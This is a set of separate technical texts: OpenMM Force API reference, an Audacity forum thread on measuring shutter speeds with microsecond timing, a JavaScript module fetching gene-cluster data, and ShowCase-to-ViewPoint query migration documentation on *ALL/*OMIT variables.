Change the values of parameters defined by other Force objects at the start of each time step
Forces may be organized into “force groups”. This is used for multiple time step integration, and allows subsets of the Forces in a System to be evaluated at different times. By default, all Forces are in group 0. Call setForceGroup() to change this. Some Force subclasses may provide additional methods to further split their computations into multiple groups. Be aware that particular Platforms may place restrictions on the use of force groups, such as requiring all nonbonded forces to be in the same group.
Subclassed by OpenMM::AmoebaGeneralizedKirkwoodForce, OpenMM::AmoebaMultipoleForce, OpenMM::AmoebaTorsionTorsionForce, OpenMM::AmoebaVdwForce, OpenMM::AmoebaWcaDispersionForce, OpenMM::AndersenThermostat, OpenMM::ATMForce, OpenMM::CMAPTorsionForce, OpenMM::CMMotionRemover, OpenMM::CustomAngleForce, OpenMM::CustomBondForce, OpenMM::CustomCentroidBondForce, OpenMM::CustomCompoundBondForce, OpenMM::CustomCVForce, OpenMM::CustomExternalForce, OpenMM::CustomGBForce, OpenMM::CustomHbondForce, OpenMM::CustomManyParticleForce, OpenMM::CustomNonbondedForce, OpenMM::CustomTorsionForce, OpenMM::DrudeForce, OpenMM::GayBerneForce, OpenMM::GBSAOBCForce, OpenMM::HarmonicAngleForce, OpenMM::HarmonicBondForce, OpenMM::HippoNonbondedForce, OpenMM::MonteCarloAnisotropicBarostat, OpenMM::MonteCarloBarostat, OpenMM::MonteCarloFlexibleBarostat, OpenMM::MonteCarloMembraneBarostat, OpenMM::NonbondedForce, OpenMM::PeriodicTorsionForce, OpenMM::RBTorsionForce, OpenMM::RMSDForce, OpenMM::RPMDMonteCarloBarostat
void setForceGroup(int group)¶
Set the force group this Force belongs to.
group – the group index. Legal values are between 0 and 31 (inclusive).
const std::string &getName() const¶
Get the name of this Force. This is an arbitrary, user modifiable identifier. By default it equals the class name, but you can change it to anything useful.
void setName(const std::string &name)¶
Set the name of this Force. This is an arbitrary, user modifiable identifier. By default it equals the class name, but you can change it to anything useful.
virtual bool usesPeriodicBoundaryConditions() const¶
true if Force uses periodic boundaries or false if it does not
|
OPCFW_CODE
|
Im abusing Audacity to measure the shutterspeeds of analogue cameras with a phantom powered photodiode connected to an audiojack. This works great with Audacity 2.x down to speeds of 0,002 seconds (1/500th). For faster shutterspeeds I still have to use Version 1.x because the "Selection timeline" shows me exact values down to microseconds (like shown here: [Link flagged by Google as dangerous]). So, could you please add a microseconds option in the dropdown menu of future Audacity-Versions? (And yes: Im too lazy to calculate them from the values given in the upper Timeline )
I’ve removed the link because your website is flagged by Google as malware.
Images may be uploaded directly to the forum using the “upload attachment” option below the message composing box.
I presume that you realise that Audacity 1.x can’t actually measure microseconds?
The smallest unit of time in digital audio is 1 sample period. At the default sample rate of 44100 Hz, that is about 23 microseconds.
If you set the sample rate to, say 100,000 Hz, then 1 sample period = 10 microseconds. The time / duration in samples can be read from the Selection Toolbar (http://manual.audacityteam.org/o/man/selection_toolbar.html). Calculating the time in microseconds (to the nearest 10 microseconds) is then very simple arithmetic.
“I presume that you realise that Audacity 1.x can’t actually measure microseconds?”
-Wrong. It did convert the amount of samples with the given samplerate to microseconds and not just to rounded milliseconds like 2.x does (at least in the Selection Toolbar) (see attached image).
Quote: “Calculating the time in microseconds (to the nearest 10 microseconds) is then very simple arithmetic.”
And that is exactly what Audacity 1.0 did automatically and I was asking for. Nothing more .
Doing all the time the (in my cases) “1:96000 * s” is not matter of “simple arithmetic” but much more of an anoyance. Nevertheless thank you again for Your efforts.
(In addition/ off topic: the linked homepage is not mine. Im sorry if the image i linked to could contain malmare. But trusting Google, who is withholding essential security/control settings from their androidsystems, in terms of malware and, even worse letting them censor "your" internet. Didt know that Goolge is the new Internetpolice now too. )
At 96000 Hz sample rate, 1 sample period is 10.41666666… microseconds.
Select 1 sample, that just over 10 microseconds. Select 2 sample and that’s about 21 microseconds. You can’t select 11, 12, 13 … 19, 20 microseconds of audio, so not what I would call “microsecond accuracy”
Any reason to not use a sample rate of 100,000 Hz and make life easier for yourself? Just set it as the Project Rate (lower left corner of the main Audacity window) before you start recording, or if the audio is pre-recorded, use “Tracks > Resample” to convert it to 100,000 Hz.
As Joe Jack says, you can exactly select 11,12, 13 … microseconds in 1.x. Set 100000 Hz Default Sample Rate (just so you can navigate microseconds easier), generate a tone, zoom in to maximum, press HOME, then drag with your mouse or nudge the cursor using RIGHT arrow and look at the Status Bar.
It’s no use for exporting less than a sample of audio, but you can measure less than a sample worth of microseconds and you can read the length of a selection in microseconds without calculating.
The status bar is changing, and so is the selection on the Time bar, but the audio selection is not moving until you jump to the next sample. The information is band-limited to half the sample rate and quantized to sample periods. With a sampling rate of 96000 Hz it cannot be determined if an event occurred at 3.000001 seconds or 3.000002 seconds, just that it occurred in that 10.4 microsecond period (assuming that the hardware is capable of that accuracy). I like the varied scientific and engineering applications for Audacity, but primarily Audacity is designed for audio.
Can you write more words about “band-limited” in this context?
Are there not always going to be compromises if you show finer divisions than a sample?
If we were concerned not to show finer divisions than a sample, then a format including microseconds could have Selection Toolbar digits that only moved in increments of multiple microseconds as appropriate to the sample rate. But I think you would still get people complaining about a missing “feature”.
I still think that misses the point of the requests.
There seems to have been no discussion about why microseconds was removed.
Suppose one does scientific experiments with “audio” at 1,000,000 Hz so that each sample is one microsecond?
Here’s a signal that rises from silence to -2 dB in 1 microsecond:
This is the same signal that has been band-limited to 48000 Hz:
and this is the same signal that has been quantized to sample values at a sample rate of 96000 Hz:
Looking at the Timeline (not shown) I can see that the signal rises at “about” 0.085305 seconds (I’d judge it to be somewhere between 0.08530 and 0.08531 seconds). Even with a microsecond scale I’d still not be able to judge the rise time any more precisely than that.
As I was suggesting, converting from samples to time in microseconds becomes trivial mental arithmetic.
PCM digital audio is always band limited to half the sample rate. That’s how Harry made his name.
The human hearing range is (generously) quoted as 20 to 20,0000 Hz. Harry Nyquist, with contribution from Claude Shannon, proved that frequencies can be precisely defined up to half the sample rate. Beyond half the sample rate it is “anybody’s guess” (aka “undefined”). Scientifically (which I think is what we are talking about) it makes no sense to “measure” to an accuracy greater than a single sample period because quantizing defines the smallest meaningful unit.
In real life, measurements will always be somewhat less accurate than defined by theory.
That’s perfectly true, but why make life more difficult? If you want measurements in microseconds or tens of microseconds you can make it simple by using an “easy” sample rate,
Why worry about common audio sample rates if we’re not working with audio?
I was unsure whether Audacity would work with a sample rate of 1 million sample per second. It does
Does the hardware being used have a bandwidth up to 500,000 Hz.
For frequencies above 20 kHz we are not talking about “audio”.
If you only consider the quantizing part, then you might expect the signal in the first image to be quantized like this:
but that is not what happens, (because of the band limiting).
but it’s still pretty meaningless to give measurement units that are several orders more “precise” than the equipment. As an example, there would be no point for an electronic tuner to display pitch to hundredths of a cent, or a wooden ruler with inches marked as 1.000000, 2.000000, 3.000000 …
I think there is a reasonable case for adding one more decimal place, but where do we draw the line? What if someone requests nanoseconds or picoseconds?
Why not user-defined formats, such as e.g. in Excel?
You’d enter a string and the time would be displayed accordingly. There had to be some predefined characters, of course.
where H=hours, M=minutes, S=seconds, CS=centi-seconds and s=samples
One placeholder means that the value is only written when there’s a non-zero value at this place or in front of it.
00:05:33 → 5:33
01:00:33 → 1:00:33
Two characters would always fill up the leading zeros.
The three dots in the parenthesis mean that the samples are displayed for all after seconds, i.e. they skip hours, minutes and seconds.
This could translate 30 min, 12 sec and 22050 samples as
We could of course stick to a simpler definition where all placeholders just have their constant cells, e.g.
“H:M:S” gives 00:00:00
Only the value in front is different because it can go higher than normal, i.e. hours would go over 24 when there’s no “D” in front.
However, I would like to have different formats at the same time, for instance Pal and Ntsc frames (e.g. “NF ↔ PF”).
Text or separators could be quoted explicitly or have a indicator in front (such as @).
I’ve not thought much about the implementation, but user defined formats could include bars, beats and sub-beat divisions, or 4, 5 , 6, 7… decimal places of a selected unit. Anyone want to generate a tone with a 0.008333333 hour duration?
|
OPCFW_CODE
|
// The logic to get a gene's values for all clusters to add to the
// cell type worksheet.
import { get as rxGet, set as rxSet } from 'state/rx'
import fetchData from 'fetch/data'
import { addGeneBubbles } from 'cellTypeWork/transformToBubbles'
import { geneAlreadyThere } from 'cellTypeGene/ctgTable'
import dataStore from 'cellTypeWork/dataStore'
import { USE_TEST_DATA } from 'cellTypeSheet/sheetList'
const DOMAIN = 'cellTypeGeneClusters'
const testData =
`stat 1 2 3
color_by 0 0.6357 -0.4
size_by 0.8606 0.74 0.4`
const receiveDataFromServer = (data) => {
const error = rxGet(DOMAIN + '.fetchMessage')
if (error !== null) {
alert(error)
} else {
addGeneBubbles(data)
}
// Get the next gene in the list.
getGenesForAllClusters()
}
// A test stub in place of server query.
const fetchTestData = (id, url, receiveFx) => {
rxSet('cellTypeGeneClusters.fetchStatus.waiting')
rxSet('cellTypeGeneClusters.fetchMessage.set', { value: 'waiting for data...' })
setTimeout(() => {
receiveFx(testData)
rxSet('cellTypeGeneClusters.fetchMessage.clear')
rxSet('cellTypeGeneClusters.fetchStatus.quiet')
}, 1000)
}
const getGeneForAllClusters = (gene) => {
// Request one gene's data for all clusters.
const colorBy = dataStore.getColorBy()
const sizeBy = dataStore.getSizeBy()
let url =
'/user/' + dataStore.getSourceUser() +
'/worksheet/' + dataStore.getSourceWorksheet() +
'/gene/' + gene +
'/color/' + colorBy +
'/size/' + sizeBy
let options = { credentials: true, responseType: 'text' }
if (USE_TEST_DATA) {
fetchTestData('cellTypeGeneClusters', url, receiveDataFromServer)
} else {
fetchData('cellTypeGeneClusters', url, receiveDataFromServer,
options)
}
// Save the gene selected.
rxSet('cellTypeGene.geneSelected.uiSet', { value: gene })
}
const getGenesForAllClusters = () => {
// Request the data for a list of genes for all clusters.
const genes = rxGet('cellTypeGeneClusters.filterText')
if (genes.length < 1) {
return
}
// Pull the first gene out of the genes string.
let gene = genes
const index = genes.indexOf('\n')
if (index > -1) {
gene = genes.slice(0, index)
}
// Get the gene data if it is not in the worksheet.
if (!geneAlreadyThere(gene)) {
// We can only track one fetch at a time for a gene add,
// so request the data in multiple fetches, one per gene.
// Fetch the first gene only. The receiveDataFromServer function will
// call this again.
getGeneForAllClusters(gene)
}
// Remove this gene from the list.
rxSet('cellTypeGeneClusters.filterText.shift')
}
export { getGeneForAllClusters, getGenesForAllClusters }
|
STACK_EDU
|
That was a long blogging break wasn't it? I just realized I haven't posted here in 7 months. I have an excuse for 4 of them: I was at the Signal Basic Officer Leadership course at Fort Gordon, GA. It was a good learning experience, I got my Security+, improved my public speaking skills, made some good friends, and learned quite a bit about satellite and radio communications. Since returning home, I've also completed the first half of my CCNA - becoming CCENT certified in the process. I've been working at , a VAR in Greensboro since July and I am loving it. We are wrapping up moving the Greensboro office to a new location and then I will be responsible for their in house lab infrastructure in Greensboro. There are a lot of really skilled engineers and businesspeople at Varrow and everyone is really approachable and helpful. One cool thing they've got going on is the which is a syndication of technical and business blogs from individuals within the company. Notice the nifty little icon in the top right corner of my blog, feel free to use it if you want to poke around and possibly even learn some stuff.
Now onto so Nerdy stuff - NetScaler quirkiness. For those of you not familiar, a NetScaler is a network device (or VM) made by Citrix, that sits in between your network segments and provides load balancing, vpn, and firewall services. You can also do things like SSL offload, HTTP acceleration via caching/compression, as well as stuff like rule based content switching. The full feature set of the NetScaler is to long to list here, nor do I have the knowledge required to explain it all, but suffice it to say that the NetScaler is an extremely powerful device. One common use for the NetScaler is to slap it in front of a web server farm and let it load balance for you, it will detect if one of em drops out from under you and exclude it from the load balance and it's pretty easy to set up. This is the scenario we were working with when the quirkiness started.
The NetScaler uses what they refer to as a Virtual IP address in order to provide load balancing. You arbitrarily configure the NetScaler with an additional IP address on the subnet you desire, you then link that IP to a service which you provision (in this case HTTP), you then link that service to corresponding servers (the web servers in our example). The NetScaler then uses whatever criteria you define to monitor the backend servers and verify that they are up, if one goes down it excludes it from the load balance. These monitors can be as simple as a ping, or as complex as a dedicated http request with specific content required in the response. Here is what the configuration looks like according to Citrix:
For our quirkyness example, we are going to assume a NetScaler is already configured as depicted above and that it sits behind a firewall or router. What we want to accomplish is moving the configuration over to a new NetScaler without taking any longer of an outage than necessary, lets say we are upgrading to a beefier model NetScaler and that's why. What we do is, via the CLI, copy all of the configuration commands for the virtual IPs, services, and backend servers off of the original NetScaler, into a text file. We then alter the Virtual IP's to something other than the production numbers as a place holder so as not to step on the production device's toes, and then issue the modified commands to the new NetScaler via the CLI. This creates an almost identical replica of our load balance from the original device on the new device. When it's cutover time, all you do is change the virtual IP's to match the production numbers, remove the production virtual IPs from the old device, and the traffic will start passing through the new NetScaler, if you have issues, you can easily revert.
Here's where it gets problematic. What if you unintentionally put a production virtual IP in the new device? It takes over that IP, and if the configuration isn't complete (imagine if you had SSL offload to configure, content switching rules, etc to configure as well), it also takes down the service. So, no problem just remove the virtual IP and you should be good, right? Wrong. The problem is two fold, partially because of the NetScaler, partially because of the way layer 3 network devices learn MAC addresses. Here's a crash course on layer 3 devices and ARP (Address Resolution Protocol) tables for the uninitiated, skip this if you are already familiar:
An ARP table what is used by layer 3 network devices (including your computer!) to figure out where on it's LAN a frame needs to go to reach its intended destination. When a device like a router gets a packet intended for a specific IP address on one of it's LANs it looks up the IP address in its ARP table (which consists of a list of IP addresses and their corresponding MAC addresses). If it doesn't have an entry for that IP, it broadcasts an ARP request to find the proper MAC for the corresponding IP. It then sends the frames to the corresponding MAC address. Switches within the network then use their MAC tables to figure out which interface to switch the frame out of and the frame can be delivered to the desired endpoint. If its a device like a computer and the IP address are on the same LAN, the computer will store an arp cache entry and send frames directly to the desired endpoint.
Back to our example. When a virtual IP is configured on the NetScaler, it sends out an ARP announcement saying pretty much, "hey I've got this IP address on this MAC address!" to make matters worse, it does this on every connected interface, presumably every subnet in your network. Relevant network devices (including your computer and your router/firewall) then update their ARP tables to reflect the announcement. So, in our example, when we misconfigured the IP on the new NetScaler, the new NetScaler told our router/firewall that it had that IP. What it does not do is let everyone know that it no longer has the address when we remove it. Since we never removed and re-added the address to the old NetScaler, it doesn't ever send a new ARP announcement either, and to my knowledge does not send out periodic ARP refreshes either (at least not frequently). What we are left with, is an ARP table entry on our router/firewall (and possibly our computer), with the wrong MAC address, and a new NetScaler that no longer responds to that IP, AKA a broken service; nobody can access the website internally or externally.
To anyone with any sort of networking knowledge, the solution is simple: clear the arp cache on the router/firewall. In the Cisco world this is done with a simple clear arp-cache from privileged exec mode. If you have hosts on the same network segment as one of the NetScalers interfaces (meaning traffic to that interface is not being routed) then you will wont to clear each hosts arp cache as well (netsh interface ip delete arpcache from command prompt in Win7). Once this is done, the service should be fixed since the layer 3 devices will now issue an ARP request for the desired IP and find the old NetScaler next time someone tries to hit the service. Long story short, be careful when you are working with devices that arbitrarily snatch up IPs, especially if in a production environment.
|
OPCFW_CODE
|
KompoZer 0.8b2 is finally ready. Few visible changes, but a lot of bugfixes and code cleaning under the hood.
You can grab KompoZer 0.8b2 here: http://kompozer.net/download.php
Enjoy, and please report bugs!
We’ve tried to solve the most frequently reported bugs:
- the CSS Editor shouldn't add those annoying “*|” strings in the selectors any more
- the preview in the “Image Properties” box now works properly
- better FTP support (right-click in the Site Manager context menu)
- the markup cleaner doesn't crash on nested lists any more
- Enter in a paragraph now creates a new paragraph
- the “Credits” panel in the About box is back ;-)
KompoZer 0.8b2 is now a more reliable editor: the regressions in the CSS editor were a complete blocker for myself, so I guess it’s been a real nightmare for most users. We’ve fixed a lot of small bugs and I think the overall user experience should be much better than with the previous versions.
18*4 Localized Binaries
Cédric Corazza, our l10n lead, has done a great job to release localized binaries for all the supported languages at once. This time he’s had much more work than for the previous beta:
- we had 9 locales for the 0.8b1 release, there are 18 locales for 0.8b2:
- Catalan, Dutch, Hungarian, Japanese got ready after the 0.8b1 release
- Simplified Chinese, Esperanto, Finnish, Portuguese, Upper Sorbian have been added for the 0.8b2
- Cédric has made Windows™ installers, which should put an end to one of the most frequent feature request
- he’s built all binaries manually, as we don’t have any kind of script to ease this task (I considered that as a typical “l10n lead job”)
Cédric, congrats! and go get some sleep, the Korean and Bulgarian locales are getting ready. ;-) I’ll definitely write a few scripts to ease your work for the next release.
Inline Spell Checker
The inline spell checker in KompoZer 0.7.10 was inherited from Nvu, it was implemented with a specific patch against the Gecko 1.7 core and it caused a lot of freezes and crashes. As a result, most users (including myself) disabled it and I didn’t see it as an important feature to bring back in KompoZer 0.8.
As you can guess, a lot of users had a very different opinion on this. :-)
Unlike Gecko 1.7, Gecko 1.8.1 has a very good built-in inline spell checker. I’ve had a look at Thunderbird’s code and I found out enabling the inline spell checker in KompoZer was a snap. I’m sorry I didn’t do it sooner — but now it’s done, and it’s working fine as far as I know.
DOM Explorer Sidebar
I’m working with Fabien ’Kasparov’ Rocu on the next version of the DOM Explorer. As Fabien is implementing his ideas in an extension, I had to clean up the DOM Explorer and add a few hooks for his addon. To ease the development of his add-on, we’ve decided to implement a part of his work directly in KompoZer 0.8b2:
- the DOM Explorer now shows the HTML attributes of the current element
- a double-click on an element in the DOM Explorer brings up its “Property” dialog
The real improvement will come with Fabien’s extension, which should be released in April 2010. I’ll come back to this in another blog post.
New Keyboard Shortcuts
I’m known to be a dangerous pervert when it comes to computer keyboards — I admit I hate having to use a mouse when I’m editing a text. These new keyboard shortcuts aren’t documented, you can see them as a hidden bonus:
- Ctrl+(Up|Down) moves the caret to the (beginning|end) of the current element
- Ctrl(+Shift)+Enter adds a new line after (before) the current element
- Alt+Shift+Enter switches to “Source” view
The Ctrl+Up/Down shortcut is more than a productivity booster. One of the known problems of the Mozilla editor component is that in some situations, it can be difficult to put the caret where you want it: for instance, there’s no easy way to put the caret right after a <div> block if it’s the last block in the page. With KompoZer 0.7.10 you had to select the <div> in the status bar, press the right arrow and hit Return; now all you need is to do a Ctrl+Down.
The “Source” View Still Sucks…
…and I’m aware of that. Please configure KompoZer to use your favorite text editor to work on the HTML source, there’s a specific “HTML” button by default in the main toolbar for that. I can’t help it, I hate the “Source” view in Nvu and KompoZer 0.7:
- I don’t see much point in a pseudo syntax hilighting that doesn’t update as you type
- I don’t see any point in showing line numbers that don’t match the *real* line numbers in the HTML file
- nobody understands why the “Source” view hides the document tabs
- it was the main source of crashes for KompoZer 0.7
The SeaMonkey-like plaintext editor, in my opinion, is much better at the moment — and on my first trunk builds (KompoZer 0.9a1pre / Gecko 1.9.3), Bespin is already working quite well.
Again, I understand a lot of users have a very different opinion on this, so I’ve tried an interesting experiment with this “Source” view: basically, I’ve re-written the main <tabeditor> element so it includes its own source editor. This embedded source editor could be used either for the “Split” view or for the “Source” view, and I could switch to “Source” mode without loosing the document tabs.
Unfortunately, this new <tabeditor> element raised a few problems that I couldn’t solve easily for this 0.8b2 release, so I’ve had to revert to the good old plaintext editor. For the 0.8b3 I’ll probably re-implement an Nvu-like “Source” view, rather than spending too much time on a feature that won’t work as well as Bespin: I prefer to release KompoZer 0.8 sooner in order to propose a Bespin-based KompoZer 0.9 as soon as possible.
The HTML Serializer Still Sucks…
…but we’re working on it. As you may have noticed, the HTML output of KompoZer 0.8 is already much cleaner than the one we had in KompoZer 0.7, especially if you check the “reformat HTML source” option: the most visible point is, there are (almost) no empty lines any more in the output files. But your well-defined indentation is still destroyed by KompoZer, which is a real pain when switching to “Source” mode.
Of course, you can use HTML Tidy as a workaround; I even used to design an Nvu extension for that. But this means dealing with temp files, serializing the files twice (once with KompoZer + reformatting with Tidy), and risking data losses (especially in utf-8, don’t ask me why). And the HTML code in the “Source” view is still a mess.
The great news is, Laurent Jouanneau has backported his XHTML serializer to Gecko 1.8.1 so I could use it for KompoZer 0.8 — and the first results look great! See this small example I saved with KompoZer 0.7.10, KompoZer 0.8b2 and KompoZer 0.8b3pre. Looks like we can finally get rid of HTML Tidy!
There are four main points to address before we can release a third (and hopefully last) beta:
- adapt KompoZer 0.8 to the new HTML serializer;
- get some kind of colored source view working;
- fix the bugs in the “Split” view so people start using it;
- work on FTP support to replace the current “Publish” button.
Please test this new version and report bugs. Many thanks to all users who donated or gave some time to keep this project running!
|
OPCFW_CODE
|
Many good conversations about cryptography have ended badly after someone asks this: “How are you managing your keys?” Bad key management undermines even the best cryptography.
Why? Because if the bad guy gets the key and the encrypted data, they get the unencrypted data. It’s as simple as that. There are three important things to consider in good key management: generation, storage, and communication of keys. Each of these are a field of study in and of themselves. We’ll provide a quick overview.
Key Management: Generation
Randomly generated keys are very secure, but they have to be stored somewhere. Be sure to use a cryptographically secure random number generator, not just any rand() function. Each algorithm requires keys of a specific size and shape. For AES, a completely random 128 or 256 bit key is appropriate. For RSA and ECC, a complicated mathematical relationship dictates the rules for key generation. Occasionally, we see internet-wide vulnerabilities because of a systematic non-randomness in key generation.
Key size varies greatly per algorithm and type of cryptography. Asymmetric keys are often much larger than symmetric keys. Compared to everything else, this is a relatively easy decision since the standard key sizes for most modern algorithms is secure.
You can also derive cryptographic keys from user-generated passwords. This is convenient because you don’t have to store them, but they are strictly less secure. Depending on how good the user is at thinking up passwords they vary from “pretty secure” to “not secure.” Password-based key derivation is a good approach if the security of the cryptography and of the account are the same anyway. You must use a proper password-based key derivation function. We see too many instances where the password itself is truncated or padded to 128 bits and used as the key. Big no-no because this makes it very fast to brute force the key.
Key Management: Storage
If you’re encrypting data for storage, it’s tempting to store the key in the same database as the encrypted data itself. This completely undermines the encryption. It’s just bad key management. A variation on this mistake is to put an encryption key in the code itself. This is OK if you want to add some slight obfuscation technique, but it is not encryption.
It is better to use a key management system like a hardware security module (HSM), hardware enclave, or Key Manager. For instance, on iOS and some versions of Android, there is a key management subsystem that programmers can use. It is tied to a hardware enclave used to protect the key from even root-level vulnerabilities. The user’s biometric or password unlocks the enclave, so the programmer doesn’t have to worry about that.
Key Management: Types of Key Storage Systems
Many key storage systems like hardware enclaves and HSMs provide two modes of operation: 1) Generate a key in the enclave and ask the enclave to perform your cryptography. This is nice because you never have to handle the (private) key again. It will not be hacked out of your application because your application doesn’t have it. 2) Generate a key in your application, ask the enclave to encrypt it, and store the encrypted key e.g. in your database. This isn’t as strong as option 1, but may be more convenient. Cloud services like AWS have HSM wrapper tools like KMS to make HSMs easier to use in this mode.
Not all of these systems support the same algorithms, so plan ahead. For instance, if you want to encrypt something in an HSM and decrypt it on a secure enclave in iOS, you need to make sure that they both support (and let the programmer access) the same algorithms. Most things support AES-GCM now-a-days, but this is harder than it seems, particularly for asymmetric encryption, which varies more.
Registering and Communicating Keys
If there is any communication in your encryption, you will need a method for registering the key and for looking up which keys are associated with which users. This is a tricky part of key management; communicating a shared or public key presents a bootstrapping problem. This can be relatively easy to solve such as a scheme where you send the user public key during signup and store it in their user record. Or it can be relatively hard such as a situation where two end users need to exchange keys without trusting any third party (such as the programmer!)
The bootstrapping problem: you need a secure communication channel to share the key, but you need to have already shared the key to establish a secure communication channel. There are a few strategies for this:
- Certificate Authority: This is the trust model of HTTPS, also known as Public Key Infrastructure (PKI).
- Trust on First Use: The first time you encounter the system or user, you trust the public or shared key. For instance, this is how SSH often works (when identifying the server) or when a user registers and sets their password or public key.
- Pre-Shared Key: The two systems can be given the same key, e.g. during the manufacturing process or during configuration.
- Out of Band Verification: For instance, two friends who want to communicate can call each-other up on the phone, make sure they’re talking to the right person, and read their public keys to each-other.
- Key Rotation: It’s worth mentioning at this stage that keys need to be rotated periodically, either because they have to be replaced after being used too many times (as with AES-GCM), because they got stolen by a bad guy, because they got lost, or because the algorithms changed. If you already have a secure channel established, you can often use that to rotate the key, but not if the key is lost.
User identity and authentication (password, biometrics, 2FA) isn’t strictly about the key management, but it’s caught up in all this. If your encryption relies on authentication (e.g. you release the user key when they log in) then encryption will only be as strong as your authentication no matter your approach to key management. Depending on your use case, that may be unavoidable, but keep in mind that authentication is typically orders of magnitude weaker than encryption. Additionally, you should consider that your attacker can circumvent authentication.
Have questions about Key Management? Contact the team at Tozny for information about how our TozStore platform takes care key management for our clients. Better yet, schedule an appointment with one of encryption experts to discuss your specific security needs!
|
OPCFW_CODE
|
Actionscript 3.0 sounds accounting
I have an Array of SoundChannels actively playing.
When new sound is going to play, I append its SoundChannel to this array.
I have to maintain such an array in order to be able to stop all sounds at once.
I would like to remove sound channel from array when it finishes to prevent inifinite growing of my array. But when I catch e=Event.SOUND_COMPLETE, I have no information on sound channel. It is only possible to get Sound as e.target.
Actually, I can maintain Array of pairs (Sound, SoundChannel).
But maybe there exists more light-weight solution?
you don't need that array :) you can just use SoundMixer.StopAll(); to stop every sound that is playing.
edit: since you want to stop all special sounds, i have a new solution.
first, you create a new actionscript class and you add this code to it.
package
{
import flash.display.DisplayObject;
import flash.events.Event;
import flash.media.SoundChannel;
public class SpecialSoundChannel extends SoundChannel
{
var _parent:DisplayObject;
public function SpecialSoundChannel(Parent:DisplayObject)
{
super();
_parent = Parent;
_parent.addEventListener("StopSpecialSound", stopChannel);
}
public function stopChannel(e:Event):void
{
//DO SOME OTHER STUFF YOU WANT DONE.
stop();
}
}
}
every time you want to have a special sound added that is not music, you just do it like this:
var _sound:SpecialSoundChannel = new SpecialSoundChannel(this);
"this" is the class where you play and stop your soundchannel, which i am assuming is the same as where you create your soundchannel and therefore can call it "this". You add the following function to that class.
public function stopSpecialSounds():void
{
var _e:Event = new Event("StopSpecialSound");
dispatchEvent(_e);
}
if you want to stop all special sounds, you just call for this last function.
Thanks for you answer. But I don't want to stop every sound. I need stop only sounds from my array. For instance, there maybe some music playing. And it must continue to play when I stop my sounds.
"I have to maintain such an array in order to be able to stop all sounds at once." looks to me like you want to be able to stop all sounds at once, so the soundMixer can do that for you the moment you want it to, without you having to keep all your soundchannels in an array.
Well, I have updated my comment. In other words, I'm not going to stop all sounds. I'm going to stop only "special" sounds i.e. all sounds from my array.
Thanks, Michiel. Beautiful solution!
glad i was able to help :) and you might want to accept the answer, so this question can be stored as answered.
|
STACK_EXCHANGE
|
Generative Adversarial Imitation Learning (GAIL) is a powerful deep reinforcement learning technique that has been developed in recent years. It combines Generative Adversarial Networks (GANs) and Inverse Reinforcement Learning (IRL), which are both important subfields within machine learning and artificial intelligence. GAIL has proven to be an effective method for solving complex decision-making problems in a number of domains.
GAIL is a type of deep reinforcement learning technique that is used for learning the optimal policy for an agent in a given environment. The goal of GAIL is to allow an agent to learn by observing a human expert performing the task, rather than by being trained through trial and error. In other words, GAIL combines the ability to model the environment with that of modeling human behavior, thus providing a mechanism for efficient learning.
GAIL is a two-player game where the discriminator tries to distinguish between the expert’s and the agent’s policies while the generator attempts to imitate the policy of the expert. The generator generates a policy for the agent by taking actions in the environment whereas, the discriminator continuously tries to distinguish between the two policies. The discriminator is trained to maximize the difference between the expert policy and the generated policy by assigning a high probability to the expert's policy and a low probability to the generated policy. On the other hand, the generator is trained to minimize the difference between the expert policy and the generated policy by optimizing the weights of the generator network.
GAIL has a wide range of applications in various domains such as autonomous vehicles, robotics, and gaming. In the domain of autonomous vehicles, GAIL can be used to learn to achieve a desired speed while avoiding obstacles. In robotics, GAIL can be used to teach robots how to manipulate objects more efficiently. Similarly, in the gaming industry, GAIL can teach agents to play a game more efficiently by carefully observing gameplay and learning from it.
The GAIL algorithm has four main steps:
GAIL has many advantages over other machine learning techniques, including:
There are several challenges as well which need to be overcome before GAIL can be used in various applications on a large scale.
In conclusion, Generative Adversarial Imitation Learning is an effective deep reinforcement learning technique that has proven to be useful in a number of domains. It leverages the ability to model the environment with that of modeling human behavior, allowing it to learn more efficiently. GAIL has many advantages over other machine learning techniques, including interpretability and versatility, but it also has some challenges, such as data acquisition and proper reward function design. Despite these challenges, GAIL has the potential to revolutionize the way we approach complex decision-making problems in a number of domains, making it an area of active research and development.
© aionlinecourse.com All rights reserved.
|
OPCFW_CODE
|
ShowCase 9x (and earlier) queries can be designed with variables that use blanks as a Null capable default value. By default all new variables added to a query are set as Null Capable. This allows the query to run without a value and, in effect, return all records for the variable.
ShowCase 10 query objects (views) do not apply this feature automatically in versions prior to R10M14 and 10.20.174. Instead the views must be designed to use the reserved keyword of *ALL (or *OMIT) along with specified leading and trailing text to achieve the same result.
Null Capable ShowCase queries will migrate using the C&DS Migration Utility, or the ViewPoint Import ShowCase Query feature. Beginning with ShowCase R10M03, the Migration Utility (and the ViewPoint Import
ShowCase Query feature) will migrate Null Capable variables in most instances, and the view/query logic will be adapted to use a *OMIT/*ALL technique.
Warning messages will be added to the migration log in the event of a translation code issue. Verification should be done along with a review of the necessity of using Null capable variables. In many cases, it is a best practice
to make a record selection mandatory so meaningful results are returned instead of all records.
Consider the following example ShowCase query:
Here is the SQL from a ShowCase query containing two variables—one for a state value (&STATE) and the other (two really) for a date range (&ENTRY_DATE).
STATE IN( &STATE )
AND ENTRY_DATE BETWEEN &ENTRY_DATE AND &ENTRY_DATE
In the example that follows, the migrated ViewPoint view will be modified so the date variables can be run to return all dates for a given state.
- Open the migrated view in the ViewPoint view designer. Notice that except for the file-library qualification, and the renaming of the second occurrence of the Entry_Date variable name, the SQL is very similar to the original ShowCase version. In fact, the view will run and prompt for input. It just won't return all records like it used to (yet).
The way ViewPoint achieves the effect of returning all values for a variable is to omit the variable and any leading or trailing SQL text associated with the variable. The variable and text are removed (omitted) from the SQL at run-time thereby returning all the records.
If you focus on the WHERE clause above we see:
WHERE 1 = 1 AND STATE IN(&STATE) AND ENTRY_DATE BETWEEN ‘&&ENTRY_DATE’ AND ‘&&ENTRY_DAT1’
At run time, if the reserved values *ALL or *OMIT are entered in place of date values, the SQL will look like so:
WHERE 1 = 1 AND STATE IN(&STATE) AND ENTRY_DATE BETWEEN ‘’ AND ‘’
Although the variables have been removed, the SQL syntax is wrong and the view will error. For each variable the leading and trailing (SQL) text must be defined so they can be removed along with the variables.
- Select the Variables tab and notice the migration process added the necessary leading and trailing. You can click in any of the entry boxes to make changes. For the two date variables the Default Value is set to *ALL. Starting with the ENTRY_DATE variable, the Omit Leading Text is set to literally
AND ENTRY_DATE BETWEEN ‘ (including the single quote) and the Omit Trailing Text is set to a single quote (
Note: The Omit Leading Text value is limited to 32 characters.
